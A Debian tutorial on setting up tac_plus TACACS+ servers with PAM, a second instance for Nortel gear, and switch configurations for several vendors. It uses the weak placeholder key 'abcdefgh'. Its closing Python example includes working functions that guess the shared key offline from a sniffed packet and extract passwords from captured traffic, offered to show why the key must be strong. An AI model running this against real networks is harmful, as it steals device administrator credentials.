<h1>Centralised authentication with tac_plus on GNU/Linux Debian</h1>

<p>Published 2012-07-18, last modified 2021-04-18, at https://www.n3oxid.fr/?p=48 (category: computing; tags: debian, linux, tacacs).</p>

<h2 class="wp-block-heading">Prerequisites</h2>

<p>Create the GNETWORK group in the Active Directory directory.</p>

<p>Both servers (10.20.30.1 and 10.20.30.2 in the device configurations below) must be members of the HOME domain. The tac_plus configuration hands password checking to PAM (login = PAM), so it is the host's PAM stack and domain join that restrict logins to members of GNETWORK; that part of the setup is not shown in this post.</p>

<h2 class="wp-block-heading">Installation and configuration</h2>

<p>Install TACACS+:</p>

<pre class="wp-block-preformatted"># aptitude update &amp;&amp; aptitude install tacacs+
</pre>

<p>Back up the TACACS+ configuration file:</p>

<pre class="wp-block-preformatted"># cp /etc/tacacs+/tac_plus.conf /etc/tacacs+/tac_plus.conf.original
</pre>

<p>Empty the TACACS+ configuration file and edit it:</p>

<pre class="wp-block-preformatted"># &gt; /etc/tacacs+/tac_plus.conf
# vim /etc/tacacs+/tac_plus.conf
</pre>

<pre class="wp-block-preformatted"># Created by Henry-Nicolas Tourneur(henry.nicolas@tourneur.be)
# See man(5) tac_plus.conf for more details

# Define where to log accounting data, this is the default.

accounting file = /var/log/tac_plus.acct

# This is the key that clients have to use to access Tacacs+

key = "abcdefgh"

# Groups

group = admins {
        default service = permit
        login = PAM
        service = exec {
                priv-lvl = 15
                idletime = 10
        }
}

# Users

user = test1 {
        member = admins
}

user = test2 {
        member = admins
}

# Many more features are available, such as ACLs, more service compatibilities,
# command authorization and scripted authorization.
# See the man page for those features.
</pre>

<p>A few points about this file. The key is the shared secret every client must present. TACACS+ does not encrypt the packet body; it XORs it with an MD5 keystream derived from this key, the session id and the sequence number, so a short key such as "abcdefgh" can be guessed offline from a single captured packet. Treat it as a placeholder and replace it, on the server and on every device below, with a long random value. Members of the admins group are authenticated through PAM (hence the domain membership above), are placed directly in privilege level 15 and get an idle timeout of 10 minutes on the exec session. Per-command authorisation and the other features mentioned in the closing comment are described in tac_plus.conf(5).</p>

<p>Create a TACACS+ configuration file for the Nortel devices:</p>

<pre class="wp-block-preformatted"># cp /etc/tacacs+/tac_plus.conf /etc/tacacs+/tac_plus_nortel.conf
</pre>

<p>Edit the TACACS+ configuration file for Nortel. It differs from the main one only in the accounting file and in the privilege level (6 instead of 15):</p>

<pre class="wp-block-preformatted"># vim /etc/tacacs+/tac_plus_nortel.conf
</pre>

<pre class="wp-block-preformatted"># Created by Henry-Nicolas Tourneur(henry.nicolas@tourneur.be)
# See man(5) tac_plus.conf for more details

# Define where to log accounting data, this is the default.

accounting file = /var/log/tac_plus_nortel.acct

# This is the key that clients have to use to access Tacacs+

key = "abcdefgh"

# Groups

group = admins {
        default service = permit
        login = PAM
        service = exec {
                priv-lvl = 6
                idletime = 10
        }
}

# Users

user = test1 {
        member = admins
}

user = test2 {
        member = admins
}

# Many more features are available, such as ACLs, more service compatibilities,
# command authorization and scripted authorization.
# See the man page for those features.
</pre>

<p>Edit the TACACS+ default-options file:</p>

<pre class="wp-block-preformatted"># vim /etc/default/tacacs+
</pre>

<pre class="wp-block-preformatted"># This is the configuration file for /etc/init.d/tacacs+
# You can overwrite default arguments passed to the daemon here.
# See man(8) tac_plus


DAEMON_OPTS="-C /etc/tacacs+/tac_plus.conf -d16"
</pre>

<p>The -d16 option sets a debug level; it is useful while bringing the service up, but drop it once authentication works, as the debug output is verbose and goes to the daemon log.</p>

<p>Create a default-options file for the Nortel TACACS+ instance:</p>

<pre class="wp-block-preformatted"># cp /etc/default/tacacs+ /etc/default/tacacs+_nortel
</pre>

<p>Edit the default-options file for the Nortel TACACS+ instance. The second instance must listen on its own port (TCP/4949) and write to its own log file, otherwise both daemons would share /var/log/tac_plus.log:</p>

<pre class="wp-block-preformatted"># vim /etc/default/tacacs+_nortel
</pre>

<pre class="wp-block-preformatted"># This is the configuration file for /etc/init.d/tacacs+
# You can overwrite default arguments passed to the daemon here.
# See man(8) tac_plus


DAEMON_OPTS="-C /etc/tacacs+/tac_plus_nortel.conf -p 4949 -d16 -l /var/log/tac_plus_nortel.log"
</pre>

<p>Create an init script for the Nortel TACACS+ instance and make it executable:</p>

<pre class="wp-block-preformatted"># cp /etc/init.d/tacacs_plus /etc/init.d/tacacs_plus_nortel &amp;&amp; chmod +x /etc/init.d/tacacs_plus_nortel
</pre>

<p>Edit the init script for the Nortel TACACS+ instance. The changes from the Debian script are the name (which selects /etc/default/tacacs+_nortel), the description, the default DAEMON_OPTS and the pid file, which tac_plus suffixes with the port when -p is used:</p>

<pre class="wp-block-preformatted"># vim /etc/init.d/tacacs_plus_nortel
</pre>

<pre class="wp-block-preformatted">#!/bin/sh
### BEGIN INIT INFO
# Provides:          tacacs+_nortel
# Required-Start:    $network $local_fs $syslog $remote_fs
# Required-Stop:     $network $local_fs $remote_fs
# Should-Start:      $named
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: TACACS+ authentication daemon for Nortel
### END INIT INFO

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

DAEMON=/usr/sbin/tac_plus
NAME="tacacs+_nortel"
DESC="TACACS+ authentication daemon for Nortel"
LOGDIR=/var/log/
STARTTIME=1
# Seconds to wait for the daemon to exit before checking again or killing it.
# The original copy of the script left this unset, which made "sleep $DIETIME" fail.
DIETIME=2

PIDFILE="/var/run/tac_plus.pid.4949"

test -x $DAEMON || exit 0

. /lib/lsb/init-functions

# Default options, these can be overridden by the information
# at /etc/default/$NAME
DAEMON_OPTS="-C /etc/tacacs+/tac_plus_nortel.conf -p 4949"          # Additional options given to the server


LOGFILE=$LOGDIR/tac_plus_nortel.log  # Server logfile

# Include defaults if available
if [ -f /etc/default/$NAME ] ; then
        . /etc/default/$NAME
fi

# Check that the user exists (if we set a user)
# Does the user exist?
if [ -n "$DAEMONUSER" ] ; then
    if getent passwd | grep -q "^$DAEMONUSER:"; then
        # Obtain the uid and gid
        DAEMONUID=`getent passwd |grep "^$DAEMONUSER:" | awk -F : '{print $3}'`
        DAEMONGID=`getent passwd |grep "^$DAEMONUSER:" | awk -F : '{print $4}'`
    else
        log_failure_msg "The user $DAEMONUSER, required to run $NAME does not exist."
        exit 1
    fi
fi


set -e

running_pid() {
# Check if a given process pid's cmdline matches a given name
    pid=$1
    name=$2
    [ -z "$pid" ] &amp;&amp; return 1
    [ ! -d /proc/$pid ] &amp;&amp;  return 1
    cmd=`cat /proc/$pid/cmdline | tr "\000" "\n"|head -n 1 |cut -d : -f 1`
    # Is this the expected server
    [ "$cmd" != "$name" ] &amp;&amp;  return 1
    return 0
}

running() {
# Check if the process is running looking at /proc
# (works for all users)

    # No pidfile, probably no daemon present
    [ ! -f "$PIDFILE" ] &amp;&amp; return 1
    pid=`cat $PIDFILE`
    running_pid $pid $DAEMON || return 1
    return 0
}

start_server() {
# Start the process using the wrapper
        start-stop-daemon --start --quiet --pidfile $PIDFILE \
               --exec $DAEMON -- $DAEMON_OPTS
        errcode=$?
        return $errcode
}

stop_server() {
# Stop the process using the wrapper
        if [ -z "$DAEMONUSER" ] ; then
            killproc -p $PIDFILE $DAEMON
            errcode=$?
        else
# if we are using a daemonuser then look for process that match
            start-stop-daemon --stop --quiet --pidfile $PIDFILE \
                        --user $DAEMONUSER \
                        --exec $DAEMON
            errcode=$?
        fi

        return $errcode
}

reload_server() {
    [ ! -f "$PIDFILE" ] &amp;&amp; return 1
    pid=`cat $PIDFILE` # This is the daemon's pid
    # Send a SIGHUP
    kill -1 $pid
    return $?
}

force_stop() {
# Force the process to die killing it manually
        [ ! -e "$PIDFILE" ] &amp;&amp; return
        if running ; then
                kill -15 $pid
        # Is it really dead?
                sleep "$DIETIME"s
                if running ; then
                        kill -9 $pid
                        sleep "$DIETIME"s
                        if running ; then
                                echo "Cannot kill $NAME (pid=$pid)!"
                                exit 1
                        fi
                fi
        fi
        rm -f $PIDFILE
}


case "$1" in
  start)
        log_daemon_msg "Starting $DESC " "$NAME"
        # Check if it's running first
        if running ;  then
            log_progress_msg "apparently already running"
            log_end_msg 0
            exit 0
        fi
        if start_server ; then
            # NOTE: Some servers might die some time after they start,
            # this code will detect this issue if STARTTIME is set
            # to a reasonable value
            [ -n "$STARTTIME" ] &amp;&amp; sleep $STARTTIME # Wait some time
            if  running ;  then
                # It's ok, the server started and is running
                log_end_msg 0
            else
                # It is not running after we did start
                log_end_msg 1
            fi
        else
            # Either we could not start it
            log_end_msg 1
        fi
        ;;
  stop)
        log_daemon_msg "Stopping $DESC" "$NAME"
        if running ; then
            # Only stop the server if we see it running
            errcode=0
            stop_server || errcode=$?
            log_end_msg $errcode
        else
            # If it's not running don't do anything
            log_progress_msg "apparently not running"
            log_end_msg 0
            exit 0
        fi
        ;;
  force-stop)
        # First try to stop gracefully the program
        $0 stop
        if running; then
            # If it's still running try to kill it more forcefully
            log_daemon_msg "Stopping (force) $DESC" "$NAME"
            errcode=0
            force_stop || errcode=$?
            log_end_msg $errcode
        fi
        ;;
  restart|force-reload)
        log_daemon_msg "Restarting $DESC" "$NAME"
        errcode=0
        stop_server || errcode=$?
        # Wait some sensible amount, some server need this
        [ -n "$DIETIME" ] &amp;&amp; sleep $DIETIME
        start_server || errcode=$?
        [ -n "$STARTTIME" ] &amp;&amp; sleep $STARTTIME
        running || errcode=$?
        log_end_msg $errcode
        ;;
  status)

        log_daemon_msg "Checking status of $DESC" "$NAME"
        if running ;  then
            log_progress_msg "running"
            log_end_msg 0
        else
            log_progress_msg "apparently not running"
            log_end_msg 1
            exit 1
        fi
        ;;
  # Use this if the daemon cannot reload
  reload)
        log_daemon_msg "Reloading $DESC configuration files" "$NAME"
        if reload_server ; then
                if running ; then
                        log_end_msg 0
                else
                        log_progress_msg "$NAME not running"
                        log_end_msg 1
                fi
        else
                log_progress_msg "Reload failed"
                log_end_msg 1
        fi
        ;;
  *)
        N=/etc/init.d/$NAME
        echo "Usage: $N {start|stop|force-stop|restart|force-reload|reload|status}" &gt;&amp;2
        exit 1
        ;;
esac

exit 0
</pre>

<p>Enable the init script for the Nortel TACACS+ instance:</p>

<pre class="wp-block-preformatted"># insserv tacacs_plus_nortel
</pre>

<p>Restart the main TACACS+ server:</p>

<pre class="wp-block-preformatted"># /etc/init.d/tacacs_plus restart
</pre>

<p>Start the TACACS+ server for Nortel:</p>

<pre class="wp-block-preformatted"># /etc/init.d/tacacs_plus_nortel start
</pre>

<p>Before pointing any device at the servers, check that both daemons are listening (TCP/49 for the main instance, TCP/4949 for the Nortel one) and that a test login as test1 succeeds against each of them. Keep a working local account on every device: all the configurations below fall back to local authentication only when the TACACS+ servers cannot be reached, not when they reject a login.</p>

<h2 class="wp-block-heading">Device configuration</h2>

<h3 class="wp-block-heading">3Com 5500G-EI</h3>

<pre class="wp-block-preformatted">#
hwtacacs scheme mytac
 primary authentication 10.20.30.1
 secondary authentication 10.20.30.2
 primary authorization 10.20.30.1
 secondary authorization 10.20.30.2
 primary accounting 10.20.30.1
 secondary accounting 10.20.30.2
 key authentication abcdefgh
 key authorization abcdefgh
 key accounting abcdefgh
 user-name-format without-domain
#
domain mytac
 scheme hwtacacs-scheme mytac local
 access-limit enable 10
#
 domain default enable mytac
#
</pre>

<h3 class="wp-block-heading">H3C S5500-52C-EI</h3>

<pre class="wp-block-preformatted">#
hwtacacs scheme mytac
 primary authentication 10.20.30.1
 secondary authentication 10.20.30.2
 primary authorization 10.20.30.1
 secondary authorization 10.20.30.2
 primary accounting 10.20.30.1
 secondary accounting 10.20.30.2
 key authentication abcdefgh
 key authorization abcdefgh
 user-name-format without-domain
#
domain mytac
 authentication login hwtacacs-scheme mytac local
 authorization login hwtacacs-scheme mytac local
 access-limit enable 10
 state active
 idle-cut disable
 self-service-url disable
#
 domain default enable mytac
#
</pre>

<h3 class="wp-block-heading">3Com 4210G 48-Port</h3>

<pre class="wp-block-preformatted">#
hwtacacs scheme mytac
 primary authentication 10.20.30.1
 secondary authentication 10.20.30.2
 primary authorization 10.20.30.1
 secondary authorization 10.20.30.2
 primary accounting 10.20.30.1
 secondary accounting 10.20.30.2
 key authentication abcdefgh
 key authorization abcdefgh
 user-name-format without-domain
#
domain mytac
 authentication login hwtacacs-scheme mytac local
 authorization login hwtacacs-scheme mytac local
 access-limit enable 10
 state active
 idle-cut disable
 self-service-url disable
#
 domain default enable mytac
#
</pre>

<p>On the H3C S5500 and the 4210G the scheme declares accounting servers but sets no accounting key, and the domain enables only login authentication and authorisation; accounting is therefore not actually in use on these two platforms, unlike the 5500G-EI, whose domain binds the whole scheme. Add a key accounting line and an accounting login line to the domain if you want the same accounting records from them.</p>

<h3 class="wp-block-heading">Cisco WS-CBS3020-HPQ</h3>

<pre class="wp-block-preformatted">!
aaa authentication login default group tacacs+ local
aaa authorization exec default group tacacs+ local
!
tacacs-server host 10.20.30.1 timeout 5
tacacs-server host 10.20.30.2 timeout 5
tacacs-server directed-request
tacacs-server key abcdefgh
!
</pre>

<p>These lines take effect only with aaa new-model enabled, which the extract does not show. The exec authorisation is what applies the priv-lvl = 15 returned by tac_plus; no command authorisation or accounting is configured here.</p>

<h3 class="wp-block-heading">Nortel Application Switch 2208 E</h3>

<p>Note: a dedicated TACACS+ instance listens on TCP/4949 for the Nortel-family devices, because their privilege levels differ from the other devices. Note: if the TACACS+ server is down, log in as the user notacacs with the password of the local admin account; this fallback is what secbd e (secure backdoor) enables. The secret and secret2 entries prompt interactively for the shared key of the primary and secondary server, which must match the key in tac_plus_nortel.conf.</p>

<pre class="wp-block-preformatted">/cfg/sys/tacacs
port 4949
prisrv 10.20.30.1
secsrv 10.20.30.2
secret
secret2
secbd e
on
apply
</pre>

<h3 class="wp-block-heading">HP ProLiant BL p-Class C-GbE2 Interconnect Switch</h3>

<p>Note: a dedicated TACACS+ instance listens on TCP/4949 for the Nortel-family devices (this HP interconnect runs the same firmware family), because their privilege levels differ from the other devices. Note: if the TACACS+ server is down, log in as the user notacacs with the password of the local admin account.</p>

<pre class="wp-block-preformatted">/cfg/sys/tacacs+
port 4949
prisrv 10.20.30.1
secsrv 10.20.30.2
secret
secret2
telnet e
on
apply</pre>
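<p>The exchange that the server and device configurations above set up (the device sends an authentication START to tac_plus, answers the GETPASS reply with the password, and receives PASS or FAIL), together with a demonstration of why the shared key matters, as an added example; this is not code from the original post or from the tac_plus project. It implements the RFC 8907 header, the MD5 pseudo-pad obfuscation and the ASCII-login packets, so a new instance (the main one on TCP/49 or the Nortel one on TCP/4949) can be tested from the Debian host before any device depends on it, and it shows that one sniffed START packet is enough to test key guesses offline, after which the password in the following CONTINUE reads straight out. Host, port, user and password values are assumptions; a live ascii_login needs network access to a tac_plus instance, while the packet builders and the key check run stand-alone.</p>

```python
# Added example (not from the original post or from tac_plus): RFC 8907 ASCII login client
# plus an offline shared-key check on a captured START packet.
import hashlib
import os
import socket
import struct

VERSION = 0xC0                  # major 0xC, minor 0 (what ASCII login uses)
TYPE_AUTHEN = 0x01
LOGIN, ASCII, SVC_LOGIN = 0x01, 0x01, 0x01
STATUS = {1: "PASS", 2: "FAIL", 3: "GETDATA", 4: "GETUSER", 5: "GETPASS", 6: "RESTART", 7: "ERROR"}
HDR = struct.Struct("!BBBBII")  # version, type, seq_no, flags, session_id, body length

def pseudo_pad(key, session_id, seq_no, length):
    """RFC 8907 section 4.5: MD5(session_id | key | version | seq_no | previous digest), chained."""
    sid, pad, prev = struct.pack("!I", session_id), b"", b""
    while len(pad) < length:
        prev = hashlib.md5(sid + key + bytes([VERSION, seq_no]) + prev).digest()
        pad += prev
    return pad[:length]

def obfuscate(body, key, session_id, seq_no):
    """XOR the body with the pad. Symmetric: the same call encodes and decodes."""
    return bytes(a ^ b for a, b in zip(body, pseudo_pad(key, session_id, seq_no, len(body))))

def packet(body, key, session_id, seq_no):
    """Header (flags 0, i.e. body obfuscated) followed by the obfuscated body."""
    return HDR.pack(VERSION, TYPE_AUTHEN, seq_no, 0, session_id, len(body)) + obfuscate(body, key, session_id, seq_no)

def authen_start(user, key, session_id, priv_lvl=1, port="tty0", rem_addr="127.0.0.1"):
    """seq 1, client to server: ASCII login START. No password yet; the server asks for it."""
    u, p, r = user.encode(), port.encode(), rem_addr.encode()
    body = struct.pack("!8B", LOGIN, priv_lvl, ASCII, SVC_LOGIN, len(u), len(p), len(r), 0) + u + p + r
    return packet(body, key, session_id, 1)

def authen_continue(user_msg, key, session_id, seq_no):
    """seq 3, 5, ...: CONTINUE carrying what the last REPLY asked for (user name or password)."""
    m = user_msg.encode()
    return packet(struct.pack("!HHB", len(m), 0, 0) + m, key, session_id, seq_no)

def authen_reply(status, server_msg, key, session_id, seq_no):
    """seq 2, 4, ...: what the server sends back; used here to build the server side of the exchange."""
    m = server_msg.encode()
    return packet(struct.pack("!BBHH", status, 0, len(m), 0) + m, key, session_id, seq_no)

def parse_reply(pkt, key):
    """Return (status name, server message, seq_no) from a REPLY packet."""
    _, ptype, seq_no, flags, session_id, length = HDR.unpack(pkt[:HDR.size])
    if ptype != TYPE_AUTHEN or length != len(pkt) - HDR.size:
        raise ValueError("malformed TACACS+ authentication packet")
    body = pkt[HDR.size:]
    if not flags & 0x01:        # TAC_PLUS_UNENCRYPTED_FLAG clear: body is obfuscated
        body = obfuscate(body, key, session_id, seq_no)
    status, _, msg_len, _ = struct.unpack("!BBHH", body[:6])
    return STATUS.get(status, str(status)), body[6:6 + msg_len].decode(errors="replace"), seq_no

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the session")
        buf += chunk
    return buf

def ascii_login(host, port, key, user, password, timeout=5.0):
    """Full exchange against a live tac_plus: START, then answer GETUSER/GETPASS until a final status."""
    session_id = struct.unpack("!I", os.urandom(4))[0]
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(authen_start(user, key, session_id))
        while True:
            hdr = recv_exact(s, HDR.size)
            status, msg, seq_no = parse_reply(hdr + recv_exact(s, HDR.unpack(hdr)[5]), key)
            if status not in ("GETUSER", "GETPASS"):
                return status, msg
            s.sendall(authen_continue(user if status == "GETUSER" else password, key, session_id, seq_no + 1))

def recover_key(captured_start, candidates):
    """Offline key guessing from one sniffed START: a wrong key leaves the fixed first eight body
    bytes and the four length fields inconsistent, so each candidate costs one short MD5 chain."""
    _, _, seq_no, _, session_id, _ = HDR.unpack(captured_start[:HDR.size])
    body = captured_start[HDR.size:]
    for cand in candidates:
        plain = obfuscate(body, cand, session_id, seq_no)
        action, priv, atype, svc, ul, pl, rl, dl = plain[:8]
        if (action == LOGIN and atype in (1, 2, 3) and priv <= 15 and svc <= 9
                and 8 + ul + pl + rl + dl == len(plain) and plain[8:].isascii()):
            return cand, plain[8:8 + ul].decode()
    return None

def continue_user_msg(pkt, key):
    """With the key known, the password inside a captured CONTINUE reads straight out."""
    _, _, seq_no, _, session_id, _ = HDR.unpack(pkt[:HDR.size])
    plain = obfuscate(pkt[HDR.size:], key, session_id, seq_no)
    return plain[5:5 + struct.unpack("!H", plain[:2])[0]].decode(errors="replace")
```

<p>To test an instance, call ascii_login with the server address, the port of the instance (49 or 4949), the key from its tac_plus.conf as bytes, and a domain user; a result of ("PASS", ...) confirms PAM, the key and the listener together. The recover_key function is the reason the key must be long and random: the START body starts with eight small fixed-range fields and four lengths that must add up to the body size, so a wrong guess is rejected after one MD5 chain, and a wordlist runs through a key like "abcdefgh" in seconds; keep TACACS+ traffic on a management network as well.</p>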